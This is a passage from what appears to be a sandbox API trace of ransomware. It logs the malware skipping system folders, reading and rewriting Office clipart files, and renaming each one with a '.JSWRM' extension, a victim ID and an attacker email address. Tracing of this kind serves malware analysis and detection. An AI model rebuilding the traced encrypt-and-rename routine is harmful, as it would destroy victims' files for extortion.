[0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="system volume information") returned -1 [0085.641] lstrcmpiW (lpString1="J0153398.WMF", lpString2="msocache") returned -1 [0085.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153398.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153398.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153398.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153398.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153398.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153398.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0085.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0085.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0085.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.642] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17508) returned 1 [0085.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4460) returned 0x24d210 [0085.642] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4460, lpOverlapped=0x0) returned 1 [0085.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.684] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4460, lpOverlapped=0x0) returned 1 [0085.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.684] CloseHandle (hObject=0x314) returned 1 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0085.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0085.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0085.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0085.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0085.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0085.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0085.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0085.686] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaa396f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x85d0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153508.WMF", cAlternateFileName="")) returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2=".") returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="..") returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="...") returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="windows") returned -1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="recovery") returned -1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="perflogs") returned -1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="documents and settings") returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="system volume information") returned -1 [0085.686] lstrcmpiW (lpString1="J0153508.WMF", lpString2="msocache") returned -1 [0085.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153508.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153508.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153508.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153508.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153508.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153508.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0085.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0085.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.688] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34256) returned 1 [0085.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x85d0) returned 0x24d210 [0085.688] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x85d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x85d0, lpOverlapped=0x0) returned 1 [0085.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.700] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x85d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x85d0, lpOverlapped=0x0) returned 1 [0085.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.701] CloseHandle (hObject=0x314) returned 1 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0085.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0085.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0085.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0085.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0085.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0085.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0085.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.702] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31d0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153514.WMF", cAlternateFileName="")) returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2=".") returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="..") returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="...") returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="windows") returned -1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="recovery") returned -1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="perflogs") returned -1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="documents and settings") returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="system volume information") returned -1 [0085.702] lstrcmpiW (lpString1="J0153514.WMF", lpString2="msocache") returned -1 [0085.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153514.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153514.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153514.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0085.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153514.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153514.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153514.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0085.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0085.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0085.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0085.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.703] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12752) returned 1 [0085.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x31d0) returned 0x24d210 [0085.704] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x31d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x31d0, lpOverlapped=0x0) returned 1 [0085.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.715] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x31d0, lpOverlapped=0x0) returned 1 [0085.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.715] CloseHandle (hObject=0x314) returned 1 [0085.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0085.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0085.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0085.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0085.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0085.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0085.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0085.717] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153516.WMF", cAlternateFileName="")) returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2=".") returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="..") returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="...") returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="windows") returned -1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="recovery") returned -1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="perflogs") returned -1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="documents and settings") returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="system volume information") returned -1 [0085.717] lstrcmpiW (lpString1="J0153516.WMF", lpString2="msocache") returned -1 [0085.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153516.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153516.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153516.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153516.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153516.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153516.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0085.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0085.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 